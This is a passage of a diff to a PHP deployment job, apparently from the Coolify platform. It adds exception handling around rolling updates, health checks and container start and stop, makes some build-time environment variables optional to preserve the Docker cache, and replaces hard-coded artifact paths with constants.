str($this->application->custom_docker_run_options)->contains('--ip6')) { - $this->application_deployment_queue->addLogEntry('Custom IP address is set, rolling update is not supported.'); - } - $this->stop_running_container(force: true); - $this->start_by_compose_file(); - } else { - $this->application_deployment_queue->addLogEntry('----------------------------------------'); + try { + $this->checkForCancellation(); + if ($this->server->isSwarm()) { $this->application_deployment_queue->addLogEntry('Rolling update started.'); - $this->start_by_compose_file(); - $this->health_check(); - $this->stop_running_container(); + $this->execute_remote_command( + [ + executeInDocker($this->deployment_uuid, "docker stack deploy --detach=true --with-registry-auth -c {$this->workdir}{$this->docker_compose_location} {$this->application->uuid}"), + ], + ); $this->application_deployment_queue->addLogEntry('Rolling update completed.'); + } else { + if ($this->use_build_server) { + $this->write_deployment_configurations(); + $this->server = $this->original_server; + } + if (count($this->application->ports_mappings_array) > 0 || (bool) $this->application->settings->is_consistent_container_name_enabled || str($this->application->settings->custom_internal_name)->isNotEmpty() || $this->pull_request_id !== 0 || str($this->application->custom_docker_run_options)->contains('--ip') || str($this->application->custom_docker_run_options)->contains('--ip6')) { + $this->application_deployment_queue->addLogEntry('----------------------------------------'); + if (count($this->application->ports_mappings_array) > 0) { + $this->application_deployment_queue->addLogEntry('Application has ports mapped to the host system, rolling update is not supported.'); + } + if ((bool) $this->application->settings->is_consistent_container_name_enabled) { + $this->application_deployment_queue->addLogEntry('Consistent container name feature enabled, rolling update is not supported.'); + } + if (str($this->application->settings->custom_internal_name)->isNotEmpty()) { + $this->application_deployment_queue->addLogEntry('Custom internal name is set, rolling update is not supported.'); + } + if ($this->pull_request_id !== 0) { + $this->application->settings->is_consistent_container_name_enabled = true; + $this->application_deployment_queue->addLogEntry('Pull request deployment, rolling update is not supported.'); + } + if (str($this->application->custom_docker_run_options)->contains('--ip') || str($this->application->custom_docker_run_options)->contains('--ip6')) { + $this->application_deployment_queue->addLogEntry('Custom IP address is set, rolling update is not supported.'); + } + $this->stop_running_container(force: true); + $this->start_by_compose_file(); + } else { + $this->application_deployment_queue->addLogEntry('----------------------------------------'); + $this->application_deployment_queue->addLogEntry('Rolling update started.'); + $this->start_by_compose_file(); + $this->health_check(); + $this->stop_running_container(); + $this->application_deployment_queue->addLogEntry('Rolling update completed.'); + } } + } catch (Exception $e) { + throw new DeploymentException('Rolling update failed ('.get_class($e).'): '.$e->getMessage(), $e->getCode(), $e); } } private function health_check() { - if ($this->server->isSwarm()) { - // Implement healthcheck for swarm - } else { - if ($this->application->isHealthcheckDisabled() && $this->application->custom_healthcheck_found === false) { - $this->newVersionIsHealthy = true; + try { + if ($this->server->isSwarm()) { + // Implement healthcheck for swarm + } else { + if ($this->application->isHealthcheckDisabled() && $this->application->custom_healthcheck_found === false) { + $this->newVersionIsHealthy = true; - return; - } - if ($this->application->custom_healthcheck_found) { - $this->application_deployment_queue->addLogEntry('Custom healthcheck found in Dockerfile.'); - } - if ($this->container_name) { - $counter = 1; - $this->application_deployment_queue->addLogEntry('Waiting for healthcheck to pass on the new container.'); - if ($this->full_healthcheck_url && ! $this->application->custom_healthcheck_found) { - $this->application_deployment_queue->addLogEntry("Healthcheck URL (inside the container): {$this->full_healthcheck_url}"); + return; } - $this->application_deployment_queue->addLogEntry("Waiting for the start period ({$this->application->health_check_start_period} seconds) before starting healthcheck."); - $sleeptime = 0; - while ($sleeptime < $this->application->health_check_start_period) { - Sleep::for(1)->seconds(); - $sleeptime++; + if ($this->application->custom_healthcheck_found) { + $this->application_deployment_queue->addLogEntry('Custom healthcheck found in Dockerfile.'); } - while ($counter <= $this->application->health_check_retries) { - $this->execute_remote_command( - [ - "docker inspect --format='{{json .State.Health.Status}}' {$this->container_name}", - 'hidden' => true, - 'save' => 'health_check', - 'append' => false, - ], - [ - "docker inspect --format='{{json .State.Health.Log}}' {$this->container_name}", - 'hidden' => true, - 'save' => 'health_check_logs', - 'append' => false, - ], - ); - $this->application_deployment_queue->addLogEntry("Attempt {$counter} of {$this->application->health_check_retries} | Healthcheck status: {$this->saved_outputs->get('health_check')}"); - $health_check_logs = data_get(collect(json_decode($this->saved_outputs->get('health_check_logs')))->last(), 'Output', '(no logs)'); - if (empty($health_check_logs)) { - $health_check_logs = '(no logs)'; + if ($this->container_name) { + $counter = 1; + $this->application_deployment_queue->addLogEntry('Waiting for healthcheck to pass on the new container.'); + if ($this->full_healthcheck_url && ! $this->application->custom_healthcheck_found) { + $this->application_deployment_queue->addLogEntry("Healthcheck URL (inside the container): {$this->full_healthcheck_url}"); } - $health_check_return_code = data_get(collect(json_decode($this->saved_outputs->get('health_check_logs')))->last(), 'ExitCode', '(no return code)'); - if ($health_check_logs !== '(no logs)' || $health_check_return_code !== '(no return code)') { - $this->application_deployment_queue->addLogEntry("Healthcheck logs: {$health_check_logs} | Return code: {$health_check_return_code}"); - } - - if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'healthy') { - $this->newVersionIsHealthy = true; - $this->application->update(['status' => 'running']); - $this->application_deployment_queue->addLogEntry('New container is healthy.'); - break; - } - if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'unhealthy') { - $this->newVersionIsHealthy = false; - $this->query_logs(); - break; - } - $counter++; + $this->application_deployment_queue->addLogEntry("Waiting for the start period ({$this->application->health_check_start_period} seconds) before starting healthcheck."); $sleeptime = 0; - while ($sleeptime < $this->application->health_check_interval) { + while ($sleeptime < $this->application->health_check_start_period) { Sleep::for(1)->seconds(); $sleeptime++; } - } - if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'starting') { - $this->query_logs(); + while ($counter <= $this->application->health_check_retries) { + $this->execute_remote_command( + [ + "docker inspect --format='{{json .State.Health.Status}}' {$this->container_name}", + 'hidden' => true, + 'save' => 'health_check', + 'append' => false, + ], + [ + "docker inspect --format='{{json .State.Health.Log}}' {$this->container_name}", + 'hidden' => true, + 'save' => 'health_check_logs', + 'append' => false, + ], + ); + $this->application_deployment_queue->addLogEntry("Attempt {$counter} of {$this->application->health_check_retries} | Healthcheck status: {$this->saved_outputs->get('health_check')}"); + $health_check_logs = data_get(collect(json_decode($this->saved_outputs->get('health_check_logs')))->last(), 'Output', '(no logs)'); + if (empty($health_check_logs)) { + $health_check_logs = '(no logs)'; + } + $health_check_return_code = data_get(collect(json_decode($this->saved_outputs->get('health_check_logs')))->last(), 'ExitCode', '(no return code)'); + if ($health_check_logs !== '(no logs)' || $health_check_return_code !== '(no return code)') { + $this->application_deployment_queue->addLogEntry("Healthcheck logs: {$health_check_logs} | Return code: {$health_check_return_code}"); + } + + if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'healthy') { + $this->newVersionIsHealthy = true; + $this->application->update(['status' => 'running']); + $this->application_deployment_queue->addLogEntry('New container is healthy.'); + break; + } + if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'unhealthy') { + $this->newVersionIsHealthy = false; + $this->query_logs(); + break; + } + $counter++; + $sleeptime = 0; + while ($sleeptime < $this->application->health_check_interval) { + Sleep::for(1)->seconds(); + $sleeptime++; + } + } + if (str($this->saved_outputs->get('health_check'))->replace('"', '')->value() === 'starting') { + $this->query_logs(); + } } } + } catch (Exception $e) { + throw new DeploymentException('Health check failed ('.get_class($e).'): '.$e->getMessage(), $e->getCode(), $e); } } @@ -1789,7 +1869,7 @@ private function prepare_builder_image(bool $firstTry = true) $env_flags = $this->generate_docker_env_flags_for_secrets(); if ($this->use_build_server) { if ($this->dockerConfigFileExists === 'NOK') { - throw new RuntimeException('Docker config file (~/.docker/config.json) not found on the build server. Please run "docker login" to login to the docker registry on the server.'); + throw new DeploymentException('Docker config file (~/.docker/config.json) not found on the build server. Please run "docker login" to login to the docker registry on the server.'); } $runCommand = "docker run -d --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}"; } else { @@ -1877,7 +1957,12 @@ private function deploy_to_additional_destinations() private function set_coolify_variables() { - $this->coolify_variables = "SOURCE_COMMIT={$this->commit} "; + $this->coolify_variables = ''; + + // Only include SOURCE_COMMIT in build context if enabled in settings + if ($this->application->settings->include_source_commit_in_build) { + $this->coolify_variables .= "SOURCE_COMMIT={$this->commit} "; + } if ($this->pull_request_id === 0) { $fqdn = $this->application->fqdn; } else { @@ -1899,7 +1984,6 @@ private function set_coolify_variables() $this->coolify_variables .= "COOLIFY_BRANCH={$this->application->git_branch} "; } $this->coolify_variables .= "COOLIFY_RESOURCE_UUID={$this->application->uuid} "; - $this->coolify_variables .= "COOLIFY_CONTAINER_NAME={$this->container_name} "; } private function check_git_if_build_needed() @@ -2055,7 +2139,7 @@ private function generate_nixpacks_confs() if ($this->saved_outputs->get('nixpacks_type')) { $this->nixpacks_type = $this->saved_outputs->get('nixpacks_type'); if (str($this->nixpacks_type)->isEmpty()) { - throw new RuntimeException('Nixpacks failed to detect the application type. Please check the documentation of Nixpacks: https://nixpacks.com/docs/providers'); + throw new DeploymentException('Nixpacks failed to detect the application type. Please check the documentation of Nixpacks: https://nixpacks.com/docs/providers'); } } @@ -2150,7 +2234,7 @@ private function generate_nixpacks_env_variables() } // Add COOLIFY_* environment variables to Nixpacks build context - $coolify_envs = $this->generate_coolify_env_variables(); + $coolify_envs = $this->generate_coolify_env_variables(forBuildTime: true); $coolify_envs->each(function ($value, $key) { $this->env_nixpacks_args->push("--env {$key}={$value}"); }); @@ -2158,17 +2242,20 @@ private function generate_nixpacks_env_variables() $this->env_nixpacks_args = $this->env_nixpacks_args->implode(' '); } - private function generate_coolify_env_variables(): Collection + private function generate_coolify_env_variables(bool $forBuildTime = false): Collection { $coolify_envs = collect([]); $local_branch = $this->branch; if ($this->pull_request_id !== 0) { - // Add SOURCE_COMMIT if not exists - if ($this->application->environment_variables_preview->where('key', 'SOURCE_COMMIT')->isEmpty()) { - if (! is_null($this->commit)) { - $coolify_envs->put('SOURCE_COMMIT', $this->commit); - } else { - $coolify_envs->put('SOURCE_COMMIT', 'unknown'); + // Only add SOURCE_COMMIT for runtime OR when explicitly enabled for build-time + // SOURCE_COMMIT changes with each commit and breaks Docker cache if included in build + if (! $forBuildTime || $this->application->settings->include_source_commit_in_build) { + if ($this->application->environment_variables_preview->where('key', 'SOURCE_COMMIT')->isEmpty()) { + if (! is_null($this->commit)) { + $coolify_envs->put('SOURCE_COMMIT', $this->commit); + } else { + $coolify_envs->put('SOURCE_COMMIT', 'unknown'); + } } } if ($this->application->environment_variables_preview->where('key', 'COOLIFY_FQDN')->isEmpty()) { @@ -2193,20 +2280,26 @@ private function generate_coolify_env_variables(): Collection if ($this->application->environment_variables_preview->where('key', 'COOLIFY_RESOURCE_UUID')->isEmpty()) { $coolify_envs->put('COOLIFY_RESOURCE_UUID', $this->application->uuid); } - if ($this->application->environment_variables_preview->where('key', 'COOLIFY_CONTAINER_NAME')->isEmpty()) { - $coolify_envs->put('COOLIFY_CONTAINER_NAME', $this->container_name); + // Only add COOLIFY_CONTAINER_NAME for runtime (not build-time) - it changes every deployment and breaks Docker cache + if (! $forBuildTime) { + if ($this->application->environment_variables_preview->where('key', 'COOLIFY_CONTAINER_NAME')->isEmpty()) { + $coolify_envs->put('COOLIFY_CONTAINER_NAME', $this->container_name); + } } } add_coolify_default_environment_variables($this->application, $coolify_envs, $this->application->environment_variables_preview); } else { - // Add SOURCE_COMMIT if not exists - if ($this->application->environment_variables->where('key', 'SOURCE_COMMIT')->isEmpty()) { - if (! is_null($this->commit)) { - $coolify_envs->put('SOURCE_COMMIT', $this->commit); - } else { - $coolify_envs->put('SOURCE_COMMIT', 'unknown'); + // Only add SOURCE_COMMIT for runtime OR when explicitly enabled for build-time + // SOURCE_COMMIT changes with each commit and breaks Docker cache if included in build + if (! $forBuildTime || $this->application->settings->include_source_commit_in_build) { + if ($this->application->environment_variables->where('key', 'SOURCE_COMMIT')->isEmpty()) { + if (! is_null($this->commit)) { + $coolify_envs->put('SOURCE_COMMIT', $this->commit); + } else { + $coolify_envs->put('SOURCE_COMMIT', 'unknown'); + } } } if ($this->application->environment_variables->where('key', 'COOLIFY_FQDN')->isEmpty()) { @@ -2231,8 +2324,11 @@ private function generate_coolify_env_variables(): Collection if ($this->application->environment_variables->where('key', 'COOLIFY_RESOURCE_UUID')->isEmpty()) { $coolify_envs->put('COOLIFY_RESOURCE_UUID', $this->application->uuid); } - if ($this->application->environment_variables->where('key', 'COOLIFY_CONTAINER_NAME')->isEmpty()) { - $coolify_envs->put('COOLIFY_CONTAINER_NAME', $this->container_name); + // Only add COOLIFY_CONTAINER_NAME for runtime (not build-time) - it changes every deployment and breaks Docker cache + if (! $forBuildTime) { + if ($this->application->environment_variables->where('key', 'COOLIFY_CONTAINER_NAME')->isEmpty()) { + $coolify_envs->put('COOLIFY_CONTAINER_NAME', $this->container_name); + } } } @@ -2246,9 +2342,13 @@ private function generate_coolify_env_variables(): Collection private function generate_env_variables() { $this->env_args = collect([]); - $this->env_args->put('SOURCE_COMMIT', $this->commit); - $coolify_envs = $this->generate_coolify_env_variables(); + // Only include SOURCE_COMMIT in build args if enabled in settings + if ($this->application->settings->include_source_commit_in_build) { + $this->env_args->put('SOURCE_COMMIT', $this->commit); + } + + $coolify_envs = $this->generate_coolify_env_variables(forBuildTime: true); $coolify_envs->each(function ($value, $key) { $this->env_args->put($key, $value); }); @@ -2632,15 +2732,15 @@ private function build_static_image() executeInDocker($this->deployment_uuid, "echo '{$nginx_config}' | base64 -d | tee {$this->workdir}/nginx.conf > /dev/null"), ], [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); @@ -2648,7 +2748,7 @@ private function build_static_image() } /** - * Wrap a docker build command with environment export from /artifacts/build-time.env + * Wrap a docker build command with environment export from build-time .env file * This enables shell interpolation of variables (e.g., APP_URL=$COOLIFY_URL) * * @param string $build_command The docker build command to wrap @@ -2656,7 +2756,7 @@ private function build_static_image() */ private function wrap_build_command_with_env_export(string $build_command): string { - return "cd {$this->workdir} && set -a && source /artifacts/build-time.env && set +a && {$build_command}"; + return "cd {$this->workdir} && set -a && source ".self::BUILD_TIME_ENV_PATH." && set +a && {$build_command}"; } private function build_image() @@ -2668,7 +2768,7 @@ private function build_image() } else { // Traditional build args approach - generate COOLIFY_ variables locally // Generate COOLIFY_ variables locally for build args - $coolify_envs = $this->generate_coolify_env_variables(); + $coolify_envs = $this->generate_coolify_env_variables(forBuildTime: true); $coolify_envs->each(function ($value, $key) { $this->build_args->push("--build-arg '{$key}'"); }); @@ -2695,10 +2795,10 @@ private function build_image() } if ($this->application->build_pack === 'nixpacks') { $this->nixpacks_plan = base64_encode($this->nixpacks_plan); - $this->execute_remote_command([executeInDocker($this->deployment_uuid, "echo '{$this->nixpacks_plan}' | base64 -d | tee /artifacts/thegameplan.json > /dev/null"), 'hidden' => true]); + $this->execute_remote_command([executeInDocker($this->deployment_uuid, "echo '{$this->nixpacks_plan}' | base64 -d | tee ".self::NIXPACKS_PLAN_PATH.' > /dev/null'), 'hidden' => true]); if ($this->force_rebuild) { $this->execute_remote_command([ - executeInDocker($this->deployment_uuid, "nixpacks build -c /artifacts/thegameplan.json --no-cache --no-error-without-start -n {$this->build_image_name} {$this->workdir} -o {$this->workdir}"), + executeInDocker($this->deployment_uuid, 'nixpacks build -c '.self::NIXPACKS_PLAN_PATH." --no-cache --no-error-without-start -n {$this->build_image_name} {$this->workdir} -o {$this->workdir}"), 'hidden' => true, ], [ executeInDocker($this->deployment_uuid, "cat {$this->workdir}/.nixpacks/Dockerfile"), @@ -2718,7 +2818,7 @@ private function build_image() } } else { $this->execute_remote_command([ - executeInDocker($this->deployment_uuid, "nixpacks build -c /artifacts/thegameplan.json --cache-key '{$this->application->uuid}' --no-error-without-start -n {$this->build_image_name} {$this->workdir} -o {$this->workdir}"), + executeInDocker($this->deployment_uuid, 'nixpacks build -c '.self::NIXPACKS_PLAN_PATH." --cache-key '{$this->application->uuid}' --no-error-without-start -n {$this->build_image_name} {$this->workdir} -o {$this->workdir}"), 'hidden' => true, ], [ executeInDocker($this->deployment_uuid, "cat {$this->workdir}/.nixpacks/Dockerfile"), @@ -2742,19 +2842,19 @@ private function build_image() $base64_build_command = base64_encode($build_command); $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); - $this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm /artifacts/thegameplan.json'), 'hidden' => true]); + $this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm '.self::NIXPACKS_PLAN_PATH), 'hidden' => true]); } else { // Dockerfile buildpack if ($this->dockerBuildkitSupported && $this->application->settings->use_build_secrets) { @@ -2786,15 +2886,15 @@ private function build_image() $base64_build_command = base64_encode($build_command); $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); @@ -2825,15 +2925,15 @@ private function build_image() executeInDocker($this->deployment_uuid, "echo '{$nginx_config}' | base64 -d | tee {$this->workdir}/nginx.conf > /dev/null"), ], [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); @@ -2860,25 +2960,25 @@ private function build_image() $base64_build_command = base64_encode($build_command); $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); } else { if ($this->application->build_pack === 'nixpacks') { $this->nixpacks_plan = base64_encode($this->nixpacks_plan); - $this->execute_remote_command([executeInDocker($this->deployment_uuid, "echo '{$this->nixpacks_plan}' | base64 -d | tee /artifacts/thegameplan.json > /dev/null"), 'hidden' => true]); + $this->execute_remote_command([executeInDocker($this->deployment_uuid, "echo '{$this->nixpacks_plan}' | base64 -d | tee ".self::NIXPACKS_PLAN_PATH.' > /dev/null'), 'hidden' => true]); if ($this->force_rebuild) { $this->execute_remote_command([ - executeInDocker($this->deployment_uuid, "nixpacks build -c /artifacts/thegameplan.json --no-cache --no-error-without-start -n {$this->production_image_name} {$this->workdir} -o {$this->workdir}"), + executeInDocker($this->deployment_uuid, 'nixpacks build -c '.self::NIXPACKS_PLAN_PATH." --no-cache --no-error-without-start -n {$this->production_image_name} {$this->workdir} -o {$this->workdir}"), 'hidden' => true, ], [ executeInDocker($this->deployment_uuid, "cat {$this->workdir}/.nixpacks/Dockerfile"), @@ -2899,7 +2999,7 @@ private function build_image() } } else { $this->execute_remote_command([ - executeInDocker($this->deployment_uuid, "nixpacks build -c /artifacts/thegameplan.json --cache-key '{$this->application->uuid}' --no-error-without-start -n {$this->production_image_name} {$this->workdir} -o {$this->workdir}"), + executeInDocker($this->deployment_uuid, 'nixpacks build -c '.self::NIXPACKS_PLAN_PATH." --cache-key '{$this->application->uuid}' --no-error-without-start -n {$this->production_image_name} {$this->workdir} -o {$this->workdir}"), 'hidden' => true, ], [ executeInDocker($this->deployment_uuid, "cat {$this->workdir}/.nixpacks/Dockerfile"), @@ -2922,19 +3022,19 @@ private function build_image() $base64_build_command = base64_encode($build_command); $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); - $this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm /artifacts/thegameplan.json'), 'hidden' => true]); + $this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm '.self::NIXPACKS_PLAN_PATH), 'hidden' => true]); } else { // Dockerfile buildpack if ($this->dockerBuildkitSupported && $this->application->settings->use_build_secrets) { @@ -2967,15 +3067,15 @@ private function build_image() $base64_build_command = base64_encode($build_command); $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee /artifacts/build.sh > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '{$base64_build_command}' | base64 -d | tee ".self::BUILD_SCRIPT_PATH.' > /dev/null'), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ], [ - executeInDocker($this->deployment_uuid, 'bash /artifacts/build.sh'), + executeInDocker($this->deployment_uuid, 'bash '.self::BUILD_SCRIPT_PATH), 'hidden' => true, ] ); @@ -3000,53 +3100,66 @@ private function graceful_shutdown_container(string $containerName) private function stop_running_container(bool $force = false) { - $this->application_deployment_queue->addLogEntry('Removing old containers.'); - if ($this->newVersionIsHealthy || $force) { - if ($this->application->settings->is_consistent_container_name_enabled || str($this->application->settings->custom_internal_name)->isNotEmpty()) { - $this->graceful_shutdown_container($this->container_name); - } else { - $containers = getCurrentApplicationContainerStatus($this->server, $this->application->id, $this->pull_request_id); - if ($this->pull_request_id === 0) { - $containers = $containers->filter(function ($container) { - return data_get($container, 'Names') !== $this->container_name && data_get($container, 'Names') !== addPreviewDeploymentSuffix($this->container_name, $this->pull_request_id); + try { + $this->application_deployment_queue->addLogEntry('Removing old containers.'); + if ($this->newVersionIsHealthy || $force) { + if ($this->application->settings->is_consistent_container_name_enabled || str($this->application->settings->custom_internal_name)->isNotEmpty()) { + $this->graceful_shutdown_container($this->container_name); + } else { + $containers = getCurrentApplicationContainerStatus($this->server, $this->application->id, $this->pull_request_id); + if ($this->pull_request_id === 0) { + $containers = $containers->filter(function ($container) { + return data_get($container, 'Names') !== $this->container_name && data_get($container, 'Names') !== addPreviewDeploymentSuffix($this->container_name, $this->pull_request_id); + }); + } + $containers->each(function ($container) { + $this->graceful_shutdown_container(data_get($container, 'Names')); }); } - $containers->each(function ($container) { - $this->graceful_shutdown_container(data_get($container, 'Names')); - }); + } else { + if ($this->application->dockerfile || $this->application->build_pack === 'dockerfile' || $this->application->build_pack === 'dockerimage') { + $this->application_deployment_queue->addLogEntry('----------------------------------------'); + $this->application_deployment_queue->addLogEntry("WARNING: Dockerfile or Docker Image based deployment detected. The healthcheck needs a curl or wget command to check the health of the application. Please make sure that it is available in the image or turn off healthcheck on Coolify's UI."); + $this->application_deployment_queue->addLogEntry('----------------------------------------'); + } + $this->application_deployment_queue->addLogEntry('New container is not healthy, rolling back to the old container.'); + $this->failDeployment(); + $this->graceful_shutdown_container($this->container_name); } - } else { - if ($this->application->dockerfile || $this->application->build_pack === 'dockerfile' || $this->application->build_pack === 'dockerimage') { - $this->application_deployment_queue->addLogEntry('----------------------------------------'); - $this->application_deployment_queue->addLogEntry("WARNING: Dockerfile or Docker Image based deployment detected. The healthcheck needs a curl or wget command to check the health of the application. Please make sure that it is available in the image or turn off healthcheck on Coolify's UI."); - $this->application_deployment_queue->addLogEntry('----------------------------------------'); - } - $this->application_deployment_queue->addLogEntry('New container is not healthy, rolling back to the old container.'); - $this->failDeployment(); - $this->graceful_shutdown_container($this->container_name); + } catch (Exception $e) { + throw new DeploymentException("Failed to stop running container: {$e->getMessage()}", $e->getCode(), $e); } } private function start_by_compose_file() { - if ($this->application->build_pack === 'dockerimage') { - $this->application_deployment_queue->addLogEntry('Pulling latest images from the registry.'); + try { + // Ensure .env file exists before docker compose tries to load it (defensive programming) $this->execute_remote_command( - [executeInDocker($this->deployment_uuid, "docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} pull"), 'hidden' => true], - [executeInDocker($this->deployment_uuid, "{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} up --build -d"), 'hidden' => true], + ["touch {$this->configuration_dir}/.env", 'hidden' => true], ); - } else { - if ($this->use_build_server) { + + if ($this->application->build_pack === 'dockerimage') { + $this->application_deployment_queue->addLogEntry('Pulling latest images from the registry.'); $this->execute_remote_command( - ["{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->configuration_dir} -f {$this->configuration_dir}{$this->docker_compose_location} up --pull always --build -d", 'hidden' => true], + [executeInDocker($this->deployment_uuid, "docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} pull"), 'hidden' => true], + [executeInDocker($this->deployment_uuid, "{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} up --build -d"), 'hidden' => true], ); } else { - $this->execute_remote_command( - [executeInDocker($this->deployment_uuid, "{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} -f {$this->workdir}{$this->docker_compose_location} up --build -d"), 'hidden' => true], - ); + if ($this->use_build_server) { + $this->execute_remote_command( + ["{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->configuration_dir} -f {$this->configuration_dir}{$this->docker_compose_location} up --pull always --build -d", 'hidden' => true], + ); + } else { + $this->execute_remote_command( + [executeInDocker($this->deployment_uuid, "{$this->coolify_variables} docker compose --project-name {$this->application->uuid} --project-directory {$this->workdir} -f {$this->workdir}{$this->docker_compose_location} up --build -d"), 'hidden' => true], + ); + } } + $this->application_deployment_queue->addLogEntry('New container started.'); + } catch (Exception $e) { + throw new DeploymentException("Failed to start container: {$e->getMessage()}", $e->getCode(), $e); } - $this->application_deployment_queue->addLogEntry('New container started.'); } private function analyzeBuildTimeVariables($variables) @@ -3201,7 +3314,9 @@ private function generate_build_secrets(Collection $variables) private function generate_secrets_hash($variables) { if (! $this->secrets_hash_key) { - $this->secrets_hash_key = bin2hex(random_bytes(32)); + // Use APP_KEY as deterministic hash key to preserve Docker build cache + // Random keys would change every deployment, breaking cache even when secrets haven't changed + $this->secrets_hash_key = config('app.key'); } if ($variables instanceof Collection) { @@ -3244,100 +3359,121 @@ private function add_build_env_variables_to_dockerfile() { if ($this->dockerBuildkitSupported) { // We dont need to add build secrets to dockerfile for buildkit, as we already added them with --secret flag in function generate_docker_env_flags_for_secrets + return; + } + + // Skip ARG injection if disabled by user - preserves Docker build cache + if ($this->application->settings->inject_build_args_to_dockerfile === false) { + $this->application_deployment_queue->addLogEntry('Skipping Dockerfile ARG injection (disabled in settings).', hidden: true); + + return; + } + + $this->execute_remote_command([ + executeInDocker($this->deployment_uuid, "cat {$this->workdir}{$this->dockerfile_location}"), + 'hidden' => true, + 'save' => 'dockerfile', + 'ignore_errors' => true, + ]); + $dockerfile = collect(str($this->saved_outputs->get('dockerfile'))->trim()->explode("\n")); + + // Find all FROM instruction positions + $fromLines = $this->findFromInstructionLines($dockerfile); + + // If no FROM instructions found, skip ARG insertion + if (empty($fromLines)) { + return; + } + + // Collect all ARG statements to insert + $argsToInsert = collect(); + + if ($this->pull_request_id === 0) { + // Only add environment variables that are available during build + $envs = $this->application->environment_variables() + ->where('key', 'not like', 'NIXPACKS_%') + ->where('is_buildtime', true) + ->get(); + foreach 